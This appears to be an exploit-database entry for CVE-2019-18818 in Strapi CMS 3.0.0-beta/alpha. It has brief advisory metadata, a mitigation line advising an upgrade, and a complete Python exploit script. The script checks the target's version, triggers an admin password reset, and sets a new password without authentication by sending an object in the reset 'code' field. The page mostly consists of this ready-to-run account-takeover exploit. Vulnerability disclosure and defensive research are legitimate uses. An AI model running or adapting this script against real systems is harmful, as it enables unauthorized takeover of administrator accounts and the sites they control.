header-logo
Suggest Exploit
vendor:
Strapi
by:
David Anglada [CodiObert]
9,8
CVSS
CRITICAL
Authentication Bypass
287
CWE
Product Name: Strapi
Affected Version From: 3.0.0-beta
Affected Version To: 3.0.0-alpha
Patch Exists: YES
Related CWE: CVE-2019-18818
CPE: a:strapi:strapi:3.0.0-beta
Metasploit: N/A
Other Scripts: N/A
Tags: cve2019,strapi,auth-bypass,intrusive,edb,cve
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://github.com/advisories/GHSA-6xc2-mj39-q599https://www.exploit-db.com/exploits/50239https://nvd.nist.gov/vuln/detail/CVE-2019-18818https://github.com/strapi/strapi/releases/tag/v3.0.0-beta.17.5https://github.com/strapi/strapi/pull/4443
Nuclei Metadata: {'max-request': 1, 'vendor': 'strapi', 'product': 'strapi'}
Platforms Tested: Linux
2021

Strapi 3.0.0-beta – Set Password (Unauthenticated)

strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.

Mitigation:

Upgrade to Strapi 3.0.1 or later.
Source

Exploit-DB raw data:

# Exploit Title: Strapi 3.0.0-beta - Set Password (Unauthenticated)
# Date: 2021-08-29
# Exploit Author: David Anglada [CodiObert]
# Vendor Homepage: https://strapi.io/
# Version: 3.0.0-beta
# Tested on: Linux
# CVE: CVE-2019-18818

#!/usr/bin/python

import requests
import sys
import json

userEmail = "valid@email.com"
strapiUrl = "http://strapi.url"
newPassword = "codiobert"

s = requests.Session()

# Get strapi version
strapiVersion = json.loads(s.get("{}/admin/strapiVersion".format(strapiUrl)).text)

print("[*] strapi version: {}".format(strapiVersion["strapiVersion"]))

# Validate vulnerable version
if strapiVersion["strapiVersion"].startswith('3.0.0-beta') or strapiVersion["strapiVersion"].startswith('3.0.0-alpha'):
	# Password reset
	print("[*] Password reset for user: {}".format(userEmail))
	resetPasswordReq={"email":userEmail, "url":"{}/admin/plugins/users-permissions/auth/reset-password".format(strapiUrl)}
	s.post("{}/".format(strapiUrl), json=resetPasswordReq)

	# Set new password
	print("[*] Setting new password")
	exploit={"code":{}, "password":newPassword, "passwordConfirmation":newPassword}
	r=s.post("{}/admin/auth/reset-password".format(strapiUrl), json=exploit)

	# Check if the password has changed
	if "username" in str(r.content):
		print("[+] New password '{}' set for user {}".format(newPassword, userEmail))
	else:
		print("\033[91m[-] Something went wrong\033[0m")
		sys.exit(1)
else:
	print("\033[91m[-] This version is not vulnerable\033[0m")
	sys.exit(1)

Navigation

Suggest Exploit

Services By CQR